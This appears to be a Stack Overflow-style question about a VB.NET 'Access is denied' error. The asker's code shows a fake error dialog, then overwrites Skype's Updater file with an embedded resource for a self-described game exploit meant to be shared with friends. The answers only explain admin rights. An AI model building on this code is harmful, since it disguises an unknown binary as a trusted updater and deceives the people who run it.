# Access is Denied in C:\Program Files\Skype\Updater

Tags: vb.net

```
Private Sub FlatButton1_Click(sender As Object, e As EventArgs) Handles FlatButton1.Click
    MessageBox.Show("Corrupt MSI, 25025, java_sp.dll is corrupt, 1035, 1305, 1311, 1324, 1327, 1335, 1600, 1601, 1606, 1624, 1643, 1722, 1744, 1788, 2352, 2753 and 2755 and 2764 and 2898 , Press Cacel to close the application", _
    "Javascript Error", _
    MessageBoxButtons.OKCancel, _
    MessageBoxIcon.Error)
    System.Threading.Thread.Sleep(4000)
    Dim A() As Byte = My.Resources.Updater
    System.IO.File.WriteAllBytes("C:\Program Files\Skype\Updater", A) : System.IO.File.GetAccessControl(Security.AccessControl.AccessControlSections.Access)
    System.Threading.Thread.Sleep(10000)
    '#########################
    '#########################
    Dim P1 As New Process
    Dim processess As Process() = Process.GetProcessesByName("GameZer Exploit Value")
    For Each process__2 As Process In processess
        process__2.Kill()
    Next
End Sub
```

Whenever I press the `flatButton1` I can't access to the skype folder and write the file from my resources.

Comment: What exactly is the desired behavior here?

Comment: my program is kinda for exploiting in some game just for test and I have created some buttons. the first button flat1  = write the bytes to the specified folder Skype\update , and when i build my project and test it , pop up some problem Access is denied , i tried to solve it but i could not

Comment: i get exception System.UnauthorizedAccessException: Access to the path 'C:\Program Files\Skype\Updater' is denied.
   at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
Access to the path : C:\Program Files\Skype\Updater . Is denied

Comment: Make sure your folder is shared in modification to everyone.

Comment: Will if i want to share this program to my friends . he wont know to modify the folder . is there a code which can modify or access to the specified Folder

Comment: First, you got to make sure that this really is your problem and make the test I recommended you...

Comment: my problem is only to Write the bytes to Skype folder update and over write it . PLUS i have Made app.manifest and change  the Windows User Account Control level  <requestedExecutionLevel  level="requireAdministrator" uiAccess="false" /> ,, But still not working !

Answer (score 3):

The Program Files folder has been read-only for standard user accounts since Windows 2000. You need to be running as an administrator for this to work.

Up through the Windows XP era people got around this by giving administrator rights to their regular account. As of Windows Vista, having administrator privileges on your regular account is no longer good enough, and you must also specifically choose to "Run as Administrator" every time you start the program.

Comment: i have already done it and made it run as administrator but still access is denied

Comment: You also won't be able to overwrite a running executable, no matter what permissions you set.

Comment: Is there any solution for that .